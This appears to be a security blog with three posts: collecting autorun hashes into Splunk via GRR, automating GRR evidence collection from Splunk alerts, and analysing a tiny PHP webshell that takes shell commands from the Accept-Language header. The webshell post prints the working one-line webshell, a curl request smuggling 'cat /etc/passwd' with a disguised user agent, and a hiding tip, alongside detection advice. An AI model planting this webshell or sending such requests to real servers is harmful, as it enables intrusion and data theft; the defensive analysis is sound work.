
Wednesday, October 9, 2019

Enterprise Autorun Collections with autorunsc.exe


Does anyone know of a tool that can collect hashes from autorun locations as thoroughly as Mark Russinovich's Autoruns? I thought it would be nice to have that level of detail reported to Splunk from all systems so the hashes can be checked against VirusTotal to find the low-hanging malware fruit.

Since I enjoy learning Python and PowerShell, I put together a GRR python_hack that launches autorunsc.exe and sends the output to Splunk. With GRR Rapid Response you can launch this as a hunt across all hosts.

The full script is on GitHub; here's a breakdown of what I put together (with thanks to the folks at stackoverflow.com).

Process flow:
  • The GRR python hack decodes and unzips autorunsc.exe, then writes it to the target host
  • The python hack then executes an encoded PowerShell command
  • The PowerShell command runs autorunsc.exe and reports the specified fields to the event log via Write-EventLog, where your log collector picks them up and forwards them to your SIEM
GRR has some weirdness with very long lines, so I had to break the binary into two parts. The autorunsc.exe binary is base64 encoded and assigned to autorunscBinary00 and autorunscBinary01. Since the encoded binary spans over 2000 lines, the variables are collapsed in the picture below for easier reading.
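The decode-and-write step can be sketched in Python like this. This is only an illustration: dummy bytes stand in for the real autorunsc.exe, zlib is my assumption for the "unzip" step, and writing to a temp directory is for the sketch's sake; the autorunscBinary00/01 names come from the hack itself.

```python
import base64
import os
import tempfile
import zlib

# Dummy payload standing in for the real (compressed) autorunsc.exe bytes.
payload = zlib.compress(b"MZ-placeholder-for-autorunsc.exe")
encoded = base64.b64encode(payload).decode()

# GRR chokes on very long lines, so the encoded binary is split in two.
mid = len(encoded) // 2
autorunscBinary00, autorunscBinary01 = encoded[:mid], encoded[mid:]

def write_binary(path, chunk0, chunk1):
    """Rejoin the two base64 chunks, decode, decompress, write to disk."""
    data = zlib.decompress(base64.b64decode(chunk0 + chunk1))
    with open(path, "wb") as f:
        f.write(data)

out_path = os.path.join(tempfile.gettempdir(), "autorunsc.exe")
write_binary(out_path, autorunscBinary00, autorunscBinary01)

# The hack would then launch the encoded PowerShell command, roughly:
# subprocess.call(["powershell.exe", "-EncodedCommand", b64Powershell])
```

Splitting the base64 string works because concatenating the two halves before decoding restores the original byte stream exactly.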

I encoded autorunsc.exe and the powershell script (b64Powershell variable) using this:
$data = 'powershell script here'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($data)
$EncodedData = [Convert]::ToBase64String($Bytes)
$EncodedData
For the binary file I used PowerShell's Get-Content and assigned its output to $data.

Here is the decoded PowerShell command in the b64Powershell variable:


There are more fields available from autorunsc.exe, but for the purpose of checking hashes against VirusTotal I'm interested in SHA-256, location, path and signer. Each of those values returned by autorunsc is tagged with a "Field=" label so it's easier to work with in Splunk. Example query to view results:
index=windows GRR EventID=187 | table Workstation hash Location Path Signer
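Since the screenshot of the PowerShell isn't reproduced here, the reporting step can be approximated in Python. This is a rough sketch, not the actual script: the CSV columns and sample row are made up to match the fields used in the Splunk query above, and the event-log write itself is PowerShell-side (Write-EventLog), so it's shown only as a comment.

```python
import csv
import io

# Hypothetical snippet of autorunsc.exe CSV output; the real output has
# more columns, these four match the fields used in the Splunk query.
autoruns_csv = io.StringIO(
    "Location,Path,Signer,SHA-256\r\n"
    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run,"
    "c:\\evil\\udpbat.exe,(Not verified),AABB1122\r\n"
)

events = []
for row in csv.DictReader(autoruns_csv):
    # Tag each value with a "Field=" label so Splunk extracts it cleanly.
    events.append("hash=%s Location=%s Path=%s Signer=%s"
                  % (row["SHA-256"], row["Location"], row["Path"], row["Signer"]))

# Each line in events would then be written via Write-EventLog (EventID 187
# in the query above) for the log collector to forward to the SIEM.
```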

Now that you have the hashes of all autorun entries in your SIEM, you can pipe them to a VirusTotal Splunk app and find some low-hanging malware fruit!




Wednesday, October 21, 2015

Automating Forensic Artifact Collection with Splunk and GRR


Recently I needed GRR to collect forensic artifacts when a Splunk alert was triggered. The point of this is to collect the forensic data when an incident ticket is generated, saving IR staff time and eliminating redundant tasks.

Example Scenario
When a pre-defined malicious event is seen, Splunk sends an email with the event details to the ticketing system and the IR folks investigate. One of the first steps in the example below is to acquire the files in question with GRR. To save time, we want to automate the collection of evidence.

AV does a horrible job of detecting malicious scripts like JS.Proslikefan.B (and anything malicious in general). However, with the help of WLS this is simple to detect and alert on. Splunk search:
`wlslogs` (EventID=4688 OR EventID=592) InternalName=wscript.exe BaseFileName!=wscript.exe
To briefly explain this alert: JS.Proslikefan maintains persistence by executing a 'random filename.lnk' file in the startup folder. The LNK file executes a randomly named copy of wscript.exe in the AppData folder along with the malicious script. When a person logs on to an infected machine, it generates a WLS event like this (snippet):

BaseFileName="udpbat.exe" InternalName="wscript.exe" CommandLine="C:\Users\tupac\AppData\Roaming\avseda\udpbat.exe  C:\Users\tupac\AppData\Roaming\avseda\vnyqxluw.js"

Process Overview 
1. Splunk alert finds execution of 'wscript.exe' when BaseFileName is not 'wscript.exe'.
2. Splunk alert launches 'wrapper.py' which then launches 'grrRemoteGetFile.py'. 
3. 'grrRemoteGetFile.py' sends GRR an API request to acquire files in question.
4. Profit.


Splunk ships its own Python, which doesn't have modules like 'requests'. Rather than installing modules into Splunk's Python, we can use a wrapper that runs the system's default Python.

Creating the Splunk Alert
Run the search, and when you're satisfied it has minimal false positives, save it as an Alert.
In the alert wizard, check the 'enable' box under Run a script and enter wrapper.py


wrapper.py (Mashed together from a few examples on the Splunk forums):
#!/usr/bin/python
import gzip, os, sys, csv
from subprocess import call

python_executable = "/usr/bin/python"
real_script = "/opt/splunk/bin/scripts/grrRemoteGetFile.py"

# Drop Splunk's environment so the system python runs cleanly
for envvar in ("PYTHONPATH", "LD_LIBRARY_PATH"):
    if envvar in os.environ:
        del os.environ[envvar]

def openany(p):
    if p.endswith(".gz"):
        return gzip.open(p)
    else:
        return open(p)

# argv[8] is the path to the gzipped search results
results_file = sys.argv[8]

for row in csv.DictReader(openany(results_file)):
    my_command = [python_executable, real_script, row["host"]]
    call(my_command)

The wrapper script does the following: 
  • Removes the PYTHONPATH and LD_LIBRARY_PATH environment variables
  • Opens the Splunk search results (gunzips and reads the csv for the host value)
  • Executes 'grrRemoteGetFile.py' with the system's default Python, passing the hostname that triggered the alert

Splunk passes 9 variables to the script when it executes. Variable 8 contains the path to the gzipped search results in csv format. The other variables are documented here.


grrRemoteGetFile.py 
#!/usr/bin/python
import sys, json, base64, requests
from requests.auth import HTTPBasicAuth

# Hostname passed in by wrapper.py (argv[0] is the script path)
hostname = sys.argv[1]

grrserver = 'https://grrserver:8000'
username = 'Tupac'
password = 'isAlive'

base64string = base64.encodestring('%s:%s' % (username, password)).replace('\n', '')
authheader = "Basic %s" % base64string

# Fetch the index page to obtain a CSRF token for the API call
index_response = requests.get(grrserver, auth=HTTPBasicAuth(username, password))
csrf_token = index_response.cookies.get("csrftoken")

headers = {
    "Authorization": authheader,
    "x-csrftoken": csrf_token,
    "x-requested-with": "XMLHttpRequest"
}

data = {
    "hostname": hostname,
    "paths": ["%%users.appdata%%\\Roaming\\*\\*.{js,exe}",
              "%%users.appdata%%\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*.lnk"],
    "pathtype": "OS"
}

response = requests.post(grrserver + "/api/clients/" + hostname + "/flows/remotegetfile",
                         headers=headers, data=json.dumps(data),
                         cookies=index_response.cookies, auth=HTTPBasicAuth(username, password))


'grrRemoteGetFile.py' will start a FileFinder flow on the host passed to it by 'wrapper.py'. By the time IR staff review the ticket, the files will already be available in GRR to download and review.

In Summary...
This is just a basic example to demonstrate how all the pieces fit together. There are some really cool things you can do with these tools to automate stuff. Some things I've been playing with:

Automatically launch Incident Response Collector ($MFT, Registry, Browser History, etc.) and full memory image when a known bad MD5 or static indicator is seen in Splunk.

Utilize WLS's hash tracking to automatically submit new binaries to internal malware analysis tools. Splunk alert would be:
`wlslogs` (EventID=4688 OR EventID=592) NewHash=True
In the wrapper.py, you would add row["NewProcessName"] and pass it to grrRemoteGetFile.py to download (instead of the static path in the example above).
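That change to the wrapper's loop might look like this. A sketch under a couple of assumptions: that the results csv preserves a NewProcessName column, and with the call() disabled since the sample data is made up.

```python
import csv
import io

python_executable = "/usr/bin/python"
real_script = "/opt/splunk/bin/scripts/grrRemoteGetFile.py"

# Stand-in for the parsed Splunk results csv (normally read via openany()
# from sys.argv[8]); the hostname and path values here are invented.
results = io.StringIO(
    "host,NewProcessName\r\n"
    "WKSTN01,C:\\Users\\tupac\\AppData\\Roaming\\avseda\\udpbat.exe\r\n"
)

for row in csv.DictReader(results):
    # Pass the new binary's path along with the host; grrRemoteGetFile.py
    # would read it from argv and fetch that file instead of a static glob.
    my_command = [python_executable, real_script,
                  row["host"], row["NewProcessName"]]
    # call(my_command)  # disabled in this sketch
```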

Get any executable downloaded from the internet and send it to internal malware analysis tools.
`wlslogs` (EventID=4688 OR EventID=592) Zone=3
Get any compressed file attachment opened from Outlook email and send to internal malware analysis tools.
`wlslogs` (EventID=4688 OR EventID=592) CreatorProcessName=OUTLOOK BaseFileName=winzip*

If you have any examples or suggestions for automation with GRR and WLS/Splunk, share them on the GRR user group; I'm really interested to hear what other folks have done.

Monday, September 2, 2013

GET your Webshell While Evading Detection

Recently I came across a webshell that was a bit different from the others. Besides being only 48 bytes, it uses the 'Accept-Language' HTTP header for accepting remote commands. The webshell on the server only needs to contain: <?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"))?>


There are a few benefits to this from the attacker's perspective. The main one is that it uses HTTP GET, which makes it quite difficult to find anomalies in the HTTP logs, even with Splunk (unless the attacker calls the file webshell.php). I would bet most people are on the lookout for HTTP POSTs to a new file rather than GETs. With Splunk you can monitor and alert on POST deviations, but with GET that strategy won't cut it.

Using curl, we GET 48bytes.php and add the Accept-Language header containing the shell command 'cat /etc/passwd'. Additionally, I added -A to use a less conspicuous user agent.
curl -H "Accept-Language: cat /etc/passwd" -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:72.0) Gecko/20132121 Firefox/19.0" http://192.168.110.114/webshells/48bytes.php
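The same request can be built in Python with the standard library. This sketch only constructs the request object (nothing is sent); the URL and command are the example values from the curl line above.

```python
import urllib.request

url = "http://192.168.110.114/webshells/48bytes.php"
req = urllib.request.Request(url, headers={
    # Shell command smuggled in a header the server-side PHP reads back
    "Accept-Language": "cat /etc/passwd",
    # Less conspicuous user agent, as with curl's -A flag
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:72.0) "
                  "Gecko/20132121 Firefox/19.0",
})
# Sending it would be: urllib.request.urlopen(req).read()
```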

When requesting the webshell, the Apache logs will show (standard CentOS 6 install):
 [01/Sep/2013:13:02:37 -0700] "GET /webshells/48bytes.php HTTP/1.1" 200 1973 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0"

The response from the web server, as you would expect looks like this:


 Running tcpdump we can see the following traffic flow:

Following the tcp stream in wireshark gives us this view: (notice the Accept-Language: cat /etc/passwd)

So how do the good guys detect this?

I was hoping that Bro Network Security Monitor would help; however, by default it doesn't log the Accept-Language string (it only logs which headers are present). Even if the majority of sites in your enterprise use TLS, it's probably not a bad idea to enable collection of header data for your web servers. If you're sending the Bro logs to Splunk (with header data), you can create an alert that fires on keywords, length, etc.

Bro_http log of 'cat /etc/passwd' via webshell:
1378069940.789597 SvWL0TLDOB3 192.168.110.129 58148 192.168.110.114 80 0 - - - - - 0 1973 200 OK - - - (empty) - HOST,USER-AGENT,ACCEPT,ACCEPT-LANGUAGE,ACCEPT-ENCODING,REFERER,CONNECTION HOST,USER-AGENT,ACCEPT,ACCEPT-LANGUAGE,ACCEPT-ENCODING,REFERER,CONNECTION
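Once header values do land in your SIEM, a crude first pass is to flag any Accept-Language value that doesn't look like a language tag. A sketch only: the allowed character set and keyword list are my assumptions and would need tuning for your environment.

```python
import re

# Words that commonly show up in smuggled shell commands (illustrative list)
SUSPICIOUS = re.compile(r"\b(cat|wget|curl|bash|uname|id)\b|/etc/passwd")

# Legitimate Accept-Language values look like "en-US,en;q=0.5"
LANG_TAG_CHARS = re.compile(r"[A-Za-z0-9,;=.\-\s*]+")

def flag_accept_language(value):
    """Return True if an Accept-Language value looks like a shell
    command rather than a language tag."""
    if LANG_TAG_CHARS.fullmatch(value) and not SUSPICIOUS.search(value):
        return False
    return True
```

For example, `flag_accept_language("en-US,en;q=0.5")` is False, while `flag_accept_language("cat /etc/passwd")` is True because of both the slash and the keyword hit.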


Snort has the same drawback of missing out on TLS connections. If you are using a proxy and have a tap into the unencrypted traffic, that would be an ideal place to look (along with using Bro).

Using Google Rapid Response (GRR) you can launch a hunt on your web servers (or all servers, for that matter) for files containing 'passthru' and '<?php'. Of course, prevention is much easier than detection.

With the OSSEC file integrity monitor you have a file-based method of detection, depending on the site's content and structure. Since most people exclude temp directories from file integrity monitoring, that's the best place to put a webshell ;)

Prevention

If you have a public-facing server without grsecurity, yer gonna have a bad time. In my opinion, grsec with a well-defined policy is the first place to start. Well, maybe the first place to start is having the admins disable exec(), passthru() and system()! Good luck with that :)